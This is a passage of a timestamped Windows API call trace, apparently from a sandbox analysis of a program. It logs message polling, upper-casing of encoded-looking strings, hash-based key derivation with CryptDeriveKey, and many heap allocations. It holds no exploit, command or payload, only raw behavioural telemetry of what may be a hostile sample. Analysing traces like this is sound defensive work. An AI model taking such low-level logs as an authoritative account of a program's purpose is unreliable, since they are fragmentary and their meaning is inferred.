lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.017] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.017] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.017] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.017] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.017] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.017] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.017] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.017] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.018] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.019] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.019] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.019] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.019] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.019] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.020] CryptHashData (hHash=0xaa5820, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.020] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.021] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.028] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.028] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.030] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.030] HeapFree (in: hHeap=0x25c0000, 